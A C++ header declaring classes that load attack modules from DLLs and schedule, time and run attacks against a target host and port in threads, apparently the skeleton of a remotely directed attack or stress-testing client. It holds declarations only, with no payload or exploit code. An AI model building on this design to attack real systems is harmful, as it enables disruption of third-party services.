#ifndef ACTIONMANAGER_INCLUDED
#define ACTIONMANAGER_INCLUDED


#pragma warning(disable: 4786)

#include <string>
#include <map>
#include "Action.h"

class ActionDll
{
public:
	ActionDll(const char* action);
	~ActionDll();
	bool IsValid();
	bool Configure(const char*, char* configuration, int len);
	bool BeginAttack(const char* configuration, const char* target, unsigned int port);
	bool Attack();
	bool EndAttack();

	static void GetAttackTypes(CStringArray& actions);

protected:
	typedef BOOL (*pConfigure)(const char *, char *, int);
	typedef BOOL (*pBeginAttack)(unsigned short* id, const char*, const char*, unsigned int);
	typedef BOOL (*pAttack)(unsigned short id);
	typedef BOOL (*pEndAttack)(unsigned short id);

	HMODULE hinst;
	bool performingattack;
	pConfigure configure;
	pBeginAttack beginAttack;
	pAttack attack;
	pEndAttack endAttack;
	unsigned short attackidentifier;
};

class ActionStatus
{
public:
	enum Status {Got, Getting, Attack, Attacked, Elapsed};
	ActionStatus();
	ActionStatus(MSXML2::IXMLDOMDocument2 *document, MSXML2::IXMLDOMNode *node);
	Status GetStatus();
	void Schedule(const char* action);
	void Configure(const char *name);
	CString GetConfiguration();
	CString ActionScheduled();
	void DownloadOk();
	void SetWhen(CTime time);
	void SetHowLong(int minutes);
	bool IsAttackToBeLaunched();
	CTime GetEndTime();
	void StartAttackOk();
	void TestElapsed();
	void PersistToXML(MSXML2::IXMLDOMDocument *document, MSXML2::IXMLDOMNode *rootNode, 
		const char *name);

private:
	static CTime StrToTime(const char *strTime);

	Status statusAction;
	CString action;
	CString actionConfiguration;
	CTime schedule;
	int howLong; // minutes
};

class ActionManager
{
public:
	BOOL OnGetEvent();
	void HandleFile(FileInfo* fi);
	void Save(const char* path);
	void Load(const char* path);
	void Synchronize();
	void ScheduleAction(const char *name, const char *type);
	void Configure(const char *name);
	CString GetStatus(const char *name);
	void PerformAttacks();

	static ActionManager* Instance();

private:
	static ActionManager *s_this;

	ActionManager();
	std::map<std::string, ActionStatus> actions;
};

class AttackThread
{
public:
	AttackThread(const char *name, const char *action, const char *configuration, CTime endTime);
	~AttackThread();
	static void s_Run(void *pToMe);
	void Run();
	void RunAndKillYourself();
	static void TerminateAllAttackerThreads();

protected:
	static HANDLE exitingEvent;
	static LONG threadCount;

	Action *pAction;
	CString action;
	CString configuration;
	CTime endTime;
};

#endif // ACTIONMANAGER_INCLUDED